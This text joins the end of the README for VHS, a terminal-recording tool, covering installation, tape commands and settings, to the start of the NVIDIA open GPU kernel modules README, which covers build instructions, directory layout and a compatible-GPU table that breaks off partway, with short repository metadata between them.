echo "deb [signed-by=/etc/apt/keyrings/charm.gpg] https://repo.charm.sh/apt/ * *" | sudo tee /etc/apt/sources.list.d/charm.list # Install ttyd from https://github.com/tsl0922/ttyd/releases sudo apt update && sudo apt install vhs ffmpeg ``` * Fedora / RHEL ```sh echo '[charm] name=Charm baseurl=https://repo.charm.sh/yum/ enabled=1 gpgcheck=1 gpgkey=https://repo.charm.sh/yum/gpg.key' | sudo tee /etc/yum.repos.d/charm.repo # Install ttyd from https://github.com/tsl0922/ttyd/releases sudo yum install vhs ffmpeg ``` * Void ```sh sudo xbps-install vhs ``` * Windows ```sh winget install charmbracelet.vhs # or scoop scoop install vhs ``` </details> [releases]: https://github.com/charmbracelet/vhs/releases ## Record Tapes VHS has the ability to generate tape files from your terminal actions! To record to a tape file, run: ```bash vhs record > cassette.tape ``` Perform any actions you want and then `exit` the terminal session to stop recording. You may want to manually edit the generated `.tape` file to add settings or modify actions. Then, you can generate the GIF: ```bash vhs cassette.tape ``` ## Publish Tapes VHS allows you to publish your GIFs to our servers for easy sharing with your friends and colleagues. Specify which file you want to share, then use the `publish` sub-command to host it on `vhs.charm.sh`. The output will provide you with links to share your GIF via browser, HTML, and Markdown. ```bash vhs publish demo.gif ``` ## The VHS Server VHS has an SSH server built in! When you self-host VHS you can access it as though it were installed locally. VHS will have access to commands and applications on the host, so you don't need to install them on your machine. To start the server run: ```sh vhs serve ``` <details> <summary>Configuration Options</summary> * `VHS_PORT`: The port to listen on (`1976`) * `VHS_HOST`: The host to listen on (`localhost`) * `VHS_GID`: The Group ID to run the server as (current user's GID) * `VHS_UID`: The User ID to run the server as (current user's UID) * `VHS_KEY_PATH`: The path to the SSH key to use (`.ssh/vhs_ed25519`) * `VHS_AUTHORIZED_KEYS_PATH`: The path to the authorized keys file (empty, publicly accessible) </details> Then, simply access VHS from a different machine via `ssh`: ```sh ssh vhs.example.com < demo.tape > demo.gif ``` ## VHS Command Reference > [!NOTE] > You can view all VHS documentation on the command line with `vhs manual`. There are a few basic types of VHS commands: * [`Output <path>`](#output): specify file output * [`Require <program>`](#require): specify required programs for tape file * [`Set <Setting> Value`](#settings): set recording settings * [`Type "<characters>"`](#type): emulate typing * [`Left`](#arrow-keys) [`Right`](#arrow-keys) [`Up`](#arrow-keys) [`Down`](#arrow-keys): arrow keys * [`Backspace`](#backspace) [`Enter`](#enter) [`Tab`](#tab) [`Space`](#space): special keys * [`Ctrl[+Alt][+Shift]+<char>`](#ctrl): press control + key and/or modifier * [`Sleep <time>`](#sleep): wait for a certain amount of time * [`Hide`](#hide): hide commands from output * [`Show`](#show): stop hiding commands from output * [`Screenshot`](#screenshot): screenshot the current frame * [`Copy/Paste`](#copy--paste): copy and paste text from clipboard. * [`Source`](#source): source commands from another tape * [`Env <Key> Value`](#env): set environment variables ### Output The `Output` command allows you to specify the location and file format of the render. You can specify more than one output in a tape file which will render them to the respective locations. ```elixir Output out.gif Output out.mp4 Output out.webm Output frames/ # a directory of frames as a PNG sequence ``` ### Require The `Require` command allows you to specify dependencies for your tape file. These are useful to fail early if a required program is missing from the `$PATH`, and it is certain that the VHS execution will not work as expected. Require commands must be defined at the top of a tape file, before any non- setting or non-output command. ```elixir # A tape file that requires gum and glow to be in the $PATH Require gum Require glow ``` ### Settings The `Set` command allows you to change global aspects of the terminal, such as the font settings, window dimensions, and GIF output location. Setting must be administered at the top of the tape file. Any setting (except `TypingSpeed`) applied after a non-setting or non-output command will be ignored. #### Set Shell Set the shell with the `Set Shell <shell>` command ```elixir Set Shell fish ``` #### Set Font Size Set the font size with the `Set FontSize <number>` command. ```elixir Set FontSize 10 Set FontSize 20 Set FontSize 40 ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/font-size-10.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/font-size-10.gif"> <img width="600" alt="Example of setting the font size to 10 pixels" src="https://stuff.charm.sh/vhs/examples/font-size-10.gif"> </picture> <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/font-size-20.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/font-size-20.gif"> <img width="600" alt="Example of setting the font size to 20 pixels" src="https://stuff.charm.sh/vhs/examples/font-size-20.gif"> </picture> <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/font-size-40.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/font-size-40.gif"> <img width="600" alt="Example of setting the font size to 40 pixels" src="https://stuff.charm.sh/vhs/examples/font-size-40.gif"> </picture> #### Set Font Family Set the font family with the `Set FontFamily "<font>"` command ```elixir Set FontFamily "Monoflow" ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/font-family.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/font-family.gif"> <img width="600" alt="Example of changing the font family to Monoflow" src="https://stuff.charm.sh/vhs/examples/font-family.gif"> </picture> #### Set Width Set the width of the terminal with the `Set Width` command. ```elixir Set Width 300 ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/width.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/width.gif"> <img width="300" alt="Example of changing the width of the terminal" src="https://stuff.charm.sh/vhs/examples/width.gif"> </picture> #### Set Height Set the height of the terminal with the `Set Height` command. ```elixir Set Height 1000 ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/height.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/height.gif"> <img width="300" alt="Example of changing the height of the terminal" src="https://stuff.charm.sh/vhs/examples/height.gif"> </picture> #### Set Letter Spacing Set the spacing between letters (tracking) with the `Set LetterSpacing` Command. ```elixir Set LetterSpacing 20 ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/letter-spacing.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/letter-spacing.gif"> <img width="600" alt="Example of changing the letter spacing to 20 pixels between characters" src="https://stuff.charm.sh/vhs/examples/letter-spacing.gif"> </picture> #### Set Line Height Set the spacing between lines with the `Set LineHeight` Command. ```elixir Set LineHeight 1.8 ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/line-height.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/line-height.gif"> <img width="600" alt="Example of changing the line height to 1.8" src="https://stuff.charm.sh/vhs/examples/line-height.gif"> </picture> #### Set Typing Speed ```elixir Set TypingSpeed 500ms # 500ms Set TypingSpeed 1s # 1s ``` Set the typing speed of seconds per key press. For example, a typing speed of `0.1` would result in a `0.1s` (`100ms`) delay between each character being typed. This setting can also be overwritten per command with the `@<time>` syntax. ```elixir Set TypingSpeed 0.1 Type "100ms delay per character" Type@500ms "500ms delay per character" ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/typing-speed.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/typing-speed.gif"> <img width="600" alt="Example of using the Type command in VHS" src="https://stuff.charm.sh/vhs/examples/typing-speed.gif"> </picture> #### Set Theme Set the theme of the terminal with the `Set Theme` command. The theme value should be a JSON string with the base 16 colors and foreground + background. ```elixir Set Theme { "name": "Whimsy", "black": "#535178", "red": "#ef6487", "green": "#5eca89", "yellow": "#fdd877", "blue": "#65aef7", "magenta": "#aa7ff0", "cyan": "#43c1be", "white": "#ffffff", "brightBlack": "#535178", "brightRed": "#ef6487", "brightGreen": "#5eca89", "brightYellow": "#fdd877", "brightBlue": "#65aef7", "brightMagenta": "#aa7ff0", "brightCyan": "#43c1be", "brightWhite": "#ffffff", "background": "#29283b", "foreground": "#b3b0d6", "selection": "#3d3c58", "cursor": "#b3b0d6" } ``` <img alt="Example of changing the theme to Whimsy" src="https://stuff.charm.sh/vhs/examples/theme.gif" width="600" /> You can also set themes by name: ```elixir Set Theme "Catppuccin Frappe" ``` See the full list by running `vhs themes`, or in [THEMES.md](./THEMES.md). #### Set Padding Set the padding (in pixels) of the terminal frame with the `Set Padding` command. ```elixir Set Padding 0 ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/padding.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/padding.gif"> <img width="600" alt="Example of setting the padding" src="https://stuff.charm.sh/vhs/examples/padding.gif"> </picture> #### Set Margin Set the margin (in pixels) of the video with the `Set Margin` command. ```elixir Set Margin 60 Set MarginFill "#6B50FF" ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://vhs.charm.sh/vhs-1miKMtNHenh7O4sv76TMwG.gif"> <source media="(prefers-color-scheme: light)" srcset="https://vhs.charm.sh/vhs-1miKMtNHenh7O4sv76TMwG.gif"> <img width="600" alt="Example of setting the margin" src="https://vhs.charm.sh/vhs-1miKMtNHenh7O4sv76TMwG.gif"> </picture> #### Set Window Bar Set the type of window bar (Colorful, ColorfulRight, Rings, RingsRight) on the terminal window with the `Set WindowBar` command. ```elixir Set WindowBar Colorful ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://vhs.charm.sh/vhs-4VgviCu38DbaGtbRzhtOUI.gif"> <source media="(prefers-color-scheme: light)" srcset="https://vhs.charm.sh/vhs-4VgviCu38DbaGtbRzhtOUI.gif"> <img width="600" alt="Example of setting the margin" src="https://vhs.charm.sh/vhs-4VgviCu38DbaGtbRzhtOUI.gif"> </picture> #### Set Border Radius Set the border radius (in pixels) of the terminal window with the `Set BorderRadius` command. ```elixir # You'll likely want to add a Margin + MarginFill if you use BorderRadius. Set Margin 20 Set MarginFill "#674EFF" Set BorderRadius 10 ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://vhs.charm.sh/vhs-4nYoy6IsUKmleJANG7N1BH.gif"> <source media="(prefers-color-scheme: light)" srcset="https://vhs.charm.sh/vhs-4nYoy6IsUKmleJANG7N1BH.gif"> <img width="400" alt="Example of setting the margin" src="https://vhs.charm.sh/vhs-4nYoy6IsUKmleJANG7N1BH.gif"> </picture> #### Set Framerate Set the rate at which VHS captures frames with the `Set Framerate` command. ```elixir Set Framerate 60 ``` #### Set Playback Speed Set the playback speed of the final render. ```elixir Set PlaybackSpeed 0.5 # Make output 2 times slower Set PlaybackSpeed 1.0 # Keep output at normal speed (default) Set PlaybackSpeed 2.0 # Make output 2 times faster ``` #### Set Loop Offset Set the offset for when the GIF loop should begin. This allows you to make the first frame of the GIF (generally used for previews) more interesting. ```elixir Set LoopOffset 5 # Start the GIF at the 5th frame Set LoopOffset 50% # Start the GIF halfway through ``` #### Set Cursor Blink Set whether the cursor should blink. Enabled by default. ```elixir Set CursorBlink false ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://vhs.charm.sh/vhs-3rMCb80VEkaDdTOJMCrxKy.gif"> <source media="(prefers-color-scheme: light)" srcset="https://vhs.charm.sh/vhs-3rMCb80VEkaDdTOJMCrxKy.gif"> <img width="600" alt="Example of setting the cursor blink." src="https://vhs.charm.sh/vhs-3rMCb80VEkaDdTOJMCrxKy.gif"> </picture> ### Type Use `Type` to emulate key presses. That is, you can use `Type` to script typing in a terminal. Type is handy for both entering commands and interacting with prompts and TUIs in the terminal. The command takes a string argument of the characters to type. You can set the standard typing speed with [`Set TypingSpeed`](#set-typing-speed) and override it in places with a `@time` argument. ```elixir # Type something Type "Whatever you want" # Type something really slowly! Type@500ms "Slow down there, partner." ``` Escape single and double quotes with backticks. ```elixir Type `VAR="Escaped"` ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/type.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/type.gif"> <img width="600" alt="Example of using the Type command in VHS" src="https://stuff.charm.sh/vhs/examples/type.gif"> </picture> ### Keys Key commands take an optional `@time` and optional repeat `count` for repeating the key press every interval of `<time>`. ``` Key[@<time>] [count] ``` #### Backspace Press the backspace key with the `Backspace` command. ```elixir Backspace 18 ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/backspace.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/backspace.gif"> <img width="600" alt="Example of pressing the Backspace key 18 times" src="https://stuff.charm.sh/vhs/examples/backspace.gif"> </picture> #### Ctrl You can access the control modifier and send control sequences with the `Ctrl` command. ```elixir Ctrl+R ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/ctrl.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/ctrl.gif"> <img width="600" alt="Example of pressing the Ctrl+R key to reverse search" src="https://stuff.charm.sh/vhs/examples/ctrl.gif"> </picture> #### Enter Press the enter key with the `Enter` command. ```elixir Enter 2 ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/enter.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/enter.gif"> <img width="600" alt="Example of pressing the Enter key twice" src="https://stuff.charm.sh/vhs/examples/enter.gif"> </picture> #### Arrow Keys Press any of the arrow keys with the `Up`, `Down`, `Left`, `Right` commands. ```elixir Up 2 Down 2 Left Right Left Right Type "B" Type "A" ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/arrow.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/arrow.gif"> <img width="600" alt="Example of pressing the arrow keys to navigate text" src="https://stuff.charm.sh/vhs/examples/arrow.gif"> </picture> #### Tab Enter a tab with the `Tab` command. ```elixir Tab@500ms 2 ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/tab.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/tab.gif"> <img width="600" alt="Example of pressing the tab key twice for autocomplete" src="https://stuff.charm.sh/vhs/examples/tab.gif"> </picture> #### Space Press the space bar with the `Space` command. ```elixir Space 10 ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/space.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/space.gif"> <img width="600" alt="Example of pressing the space key" src="https://stuff.charm.sh/vhs/examples/space.gif"> </picture> #### Page Up / Down Press the Page Up / Down keys with the `PageUp` or `PageDown` commands. ```elixir PageUp 3 PageDown 5 ``` ### Sleep The `Sleep` command allows you to continue capturing frames without interacting with the terminal. This is useful when you need to wait on something to complete while including it in the recording like a spinner or loading state. The command takes a number argument in seconds. ```elixir Sleep 0.5 # 500ms Sleep 2 # 2s Sleep 100ms # 100ms Sleep 1s # 1s ``` ### Hide The `Hide` command instructs VHS to stop capturing frames. It's useful to pause a recording to perform hidden commands. ```elixir Hide ``` This command is helpful for performing any setup and cleanup required to record a GIF, such as building the latest version of a binary and removing the binary once the demo is recorded. ```elixir Output example.gif # Setup Hide Type "go build -o example . && clear" Enter Show # Recording... Type 'Running ./example' ... Enter # Cleanup Hide Type 'rm example' ``` ### Show The `Show` command instructs VHS to begin capturing frames, again. It's useful after a `Hide` command to resume frame recording for the output. ```elixir Hide Type "You won't see this being typed." Show Type "You will see this being typed." ``` <picture> <source media="(prefers-color-scheme: dark)" srcset="https://stuff.charm.sh/vhs/examples/hide.gif"> <source media="(prefers-color-scheme: light)" srcset="https://stuff.charm.sh/vhs/examples/hide.gif"> <img width="600" alt="Example of typing something while hidden" src="https://stuff.charm.sh/vhs/examples/hide.gif"> </picture> ### Screenshot The `Screenshot` command captures the current frame (png format). ```elixir # At any point... Screenshot examples/screenshot.png ``` ### Copy / Paste The `Copy` and `Paste` copy and paste the string from clipboard. ```elixir Copy "https://github.com/charmbracelet" Type "open " Sleep 500ms Paste ``` ### Env `Env` command sets the environment variable via key-value pair. ```elixir Env HELLO "WORLD" Type "echo $HELLO" Enter Sleep 1s ``` ### Source The `source` command allows you to execute commands from another tape. ```elixir Source config.tape ``` *** ## Continuous Integration You can hook up VHS to your CI pipeline to keep your GIFs up-to-date with the official VHS GitHub Action: > [โš™๏ธ charmbracelet/vhs-action](https://github.com/charmbracelet/vhs-action) VHS can also be used for integration testing. Use the `.txt` or `.ascii` output to generate golden files. Store these files in a git repository to ensure there are no diffs between runs of the tape file. ```elixir Output golden.ascii ``` ## Syntax Highlighting Thereโ€™s a tree-sitter grammar for `.tape` files available for editors that support syntax highlighting with tree-sitter: > [๐ŸŒณ charmbracelet/tree-sitter-vhs](https://github.com/charmbracelet/tree-sitter-vhs) It works great with Neovim, Emacs, and so on! ## Feedback Weโ€™d love to hear your thoughts on this project. Feel free to drop us a note! * [Twitter](https://twitter.com/charmcli) * [The Fediverse](https://mastodon.social/@charmcli) * [Discord](https://charm.sh/chat) ## License [MIT](https://github.com/charmbracelet/vhs/raw/main/LICENSE) *** Part of [Charm](https://charm.sh). <a href="https://charm.sh/"> <img alt="The Charm logo" width="400" src="https://stuff.charm.sh/charm-badge.jpg" /> </a> Charm็ƒญ็ˆฑๅผ€ๆบ โ€ข Charm loves open source
Your CLI home video recorder ๐Ÿ“ผ
gif,recording,terminal,video,cli,command-line,ascii,vhs
11
47
279
636
71
13
5
NVIDIA/open-gpu-kernel-modules
# NVIDIA Linux Open GPU Kernel Module Source This is the source release of the NVIDIA Linux open GPU kernel modules, version 550.90.07. ## How to Build To build: make modules -j$(nproc) To install, first uninstall any existing NVIDIA kernel modules. Then, as root: make modules_install -j$(nproc) Note that the kernel modules built here must be used with GSP firmware and user-space NVIDIA GPU driver components from a corresponding 550.90.07 driver release. This can be achieved by installing the NVIDIA GPU driver from the .run file using the `--no-kernel-modules` option. E.g., sh ./NVIDIA-Linux-[...].run --no-kernel-modules ## Supported Target CPU Architectures Currently, the kernel modules can be built for x86_64 or aarch64. If cross-compiling, set these variables on the make command line: TARGET_ARCH=aarch64|x86_64 CC LD AR CXX OBJCOPY E.g., # compile on x86_64 for aarch64 make modules -j$(nproc) \ TARGET_ARCH=aarch64 \ CC=aarch64-linux-gnu-gcc \ LD=aarch64-linux-gnu-ld \ AR=aarch64-linux-gnu-ar \ CXX=aarch64-linux-gnu-g++ \ OBJCOPY=aarch64-linux-gnu-objcopy ## Other Build Knobs NV_VERBOSE - Set this to "1" to print each complete command executed; otherwise, a succinct "CC" line is printed. DEBUG - Set this to "1" to build the kernel modules as debug. By default, the build compiles without debugging information. This also enables various debug log messages in the kernel modules. These variables can be set on the make command line. E.g., make modules -j$(nproc) NV_VERBOSE=1 ## Supported Toolchains Any reasonably modern version of GCC or Clang can be used to build the kernel modules. Note that the kernel interface layers of the kernel modules must be built with the toolchain that was used to build the kernel. ## Supported Linux Kernel Versions The NVIDIA open kernel modules support the same range of Linux kernel versions that are supported with the proprietary NVIDIA kernel modules. This is currently Linux kernel 3.10 or newer. ## How to Contribute Contributions can be made by creating a pull request on https://github.com/NVIDIA/open-gpu-kernel-modules We'll respond via GitHub. Note that when submitting a pull request, you will be prompted to accept a Contributor License Agreement. This code base is shared with NVIDIA's proprietary drivers, and various processing is performed on the shared code to produce the source code that is published here. This has several implications for the foreseeable future: * The GitHub repository will function mostly as a snapshot of each driver release. * We do not expect to be able to provide revision history for individual changes that were made to NVIDIA's shared code base. There will likely only be one git commit per driver release. * We may not be able to reflect individual contributions as separate git commits in the GitHub repository. * Because the code undergoes various processing prior to publishing here, contributions made here require manual merging to be applied to the shared code base. Therefore, large refactoring changes made here may be difficult to merge and accept back into the shared code base. If you have large refactoring to suggest, please contact us in advance, so we can coordinate. ## How to Report Issues Problems specific to the Open GPU Kernel Modules can be reported in the Issues section of the https://github.com/NVIDIA/open-gpu-kernel-modules repository. Further, any of the existing bug reporting venues can be used to communicate problems to NVIDIA, such as our forum: https://forums.developer.nvidia.com/c/gpu-graphics/linux/148 or linux-bugs@nvidia.com. Please see the 'NVIDIA Contact Info and Additional Resources' section of the NVIDIA GPU Driver README for details. Please see the separate [SECURITY.md](SECURITY.md) document if you believe you have discovered a security vulnerability in this software. ## Kernel Interface and OS-Agnostic Components of Kernel Modules Most of NVIDIA's kernel modules are split into two components: * An "OS-agnostic" component: this is the component of each kernel module that is independent of operating system. * A "kernel interface layer": this is the component of each kernel module that is specific to the Linux kernel version and configuration. When packaged in the NVIDIA .run installation package, the OS-agnostic component is provided as a binary: it is large and time-consuming to compile, so pre-built versions are provided so that the user does not have to compile it during every driver installation. For the nvidia.ko kernel module, this component is named "nv-kernel.o_binary". For the nvidia-modeset.ko kernel module, this component is named "nv-modeset-kernel.o_binary". Neither nvidia-drm.ko nor nvidia-uvm.ko have OS-agnostic components. The kernel interface layer component for each kernel module must be built for the target kernel. ## Directory Structure Layout - `kernel-open/` The kernel interface layer - `kernel-open/nvidia/` The kernel interface layer for nvidia.ko - `kernel-open/nvidia-drm/` The kernel interface layer for nvidia-drm.ko - `kernel-open/nvidia-modeset/` The kernel interface layer for nvidia-modeset.ko - `kernel-open/nvidia-uvm/` The kernel interface layer for nvidia-uvm.ko - `src/` The OS-agnostic code - `src/nvidia/` The OS-agnostic code for nvidia.ko - `src/nvidia-modeset/` The OS-agnostic code for nvidia-modeset.ko - `src/common/` Utility code used by one or more of nvidia.ko and nvidia-modeset.ko - `nouveau/` Tools for integration with the Nouveau device driver ## Nouveau device driver integration The Python script in the 'nouveau' directory is used to extract some of the firmware binary images (and related data) encoded in the source code and store them as distinct files. These files are used by the Nouveau device driver to load and communicate with the GSP firmware. The layout of the binary files is described in nouveau_firmware_layout.ods, which is an OpenDocument Spreadsheet file, compatible with most spreadsheet software applications. ## Compatible GPUs The NVIDIA open kernel modules can be used on any Turing or later GPU (see the table below). However, in the __DRIVER_VERION__ release, GeForce and Workstation support is considered to be Beta quality. The open kernel modules are suitable for broad usage, and NVIDIA requests feedback on any issues encountered specific to them. For details on feature support and limitations, see the NVIDIA GPU driver end user README here: https://us.download.nvidia.com/XFree86/Linux-x86_64/550.90.07/README/kernel_open.html For vGPU support, please refer to the README.vgpu packaged in the vGPU Host Package for more details. In the below table, if three IDs are listed, the first is the PCI Device ID, the second is the PCI Subsystem Vendor ID, and the third is the PCI Subsystem Device ID. | Product Name | PCI ID | | ----------------------------------------------- | -------------- | | NVIDIA TITAN RTX | 1E02 | | NVIDIA GeForce RTX 2080 Ti | 1E04 | | NVIDIA GeForce RTX 2080 Ti | 1E07 | | Quadro RTX 6000 | 1E30 | | Quadro RTX 8000 | 1E30 1028 129E | | Quadro RTX 8000 | 1E30 103C 129E | | Quadro RTX 8000 | 1E30 10DE 129E | | Quadro RTX 6000 | 1E36 | | Quadro RTX 8000 | 1E78 10DE 13D8 | | Quadro RTX 6000 | 1E78 10DE 13D9 | | NVIDIA GeForce RTX 2080 SUPER | 1E81 | | NVIDIA GeForce RTX 2080 | 1E82 | | NVIDIA GeForce RTX 2070 SUPER | 1E84 | | NVIDIA GeForce RTX 2080 | 1E87 | | NVIDIA GeForce RTX 2060 | 1E89 | | NVIDIA GeForce RTX 2080 | 1E90 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1025 1375 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 08A1 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 08A2 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 08EA | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 08EB | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 08EC | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 08ED | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 08EE | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 08EF | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 093B | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 093C | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 103C 8572 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 103C 8573 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 103C 8602 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 103C 8606 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 103C 86C6 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 103C 86C7 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 103C 87A6 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 103C 87A7 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1043 131F | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1043 137F | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1043 141F | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1043 1751 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1458 1660 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1458 1661 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1458 1662 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1458 75A6 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1458 75A7 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1458 86A6 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1458 86A7 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1462 1274 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1462 1277 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 152D 1220 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1558 95E1 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1558 97E1 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1A58 2002 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1A58 2005 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1A58 2007 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1A58 3000 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1A58 3001 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1D05 1069 | | NVIDIA GeForce RTX 2070 Super | 1E91 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 103C 8607 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 103C 8736 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 103C 8738 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 103C 8772 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 103C 878A | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 103C 878B | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1043 1E61 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1458 1511 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1458 75B3 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1458 75B4 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1458 76B2 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1458 76B3 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1458 78A2 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1458 78A3 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1458 86B2 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1458 86B3 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1462 12AE | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1462 12B0 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1462 12C6 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 17AA 22C3 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 17AA 22C5 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1A58 2009 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1A58 200A | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1A58 3002 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 8086 3012 | | NVIDIA GeForce RTX 2080 Super | 1E93 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1025 1401 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1025 149C | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1028 09D2 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 103C 8607 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 103C 86C7 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 103C 8736 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 103C 8738 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 103C 8772 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 103C 87A6 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 103C 87A7 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1458 75B1 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1458 75B2 | | NVIDIA GeForce 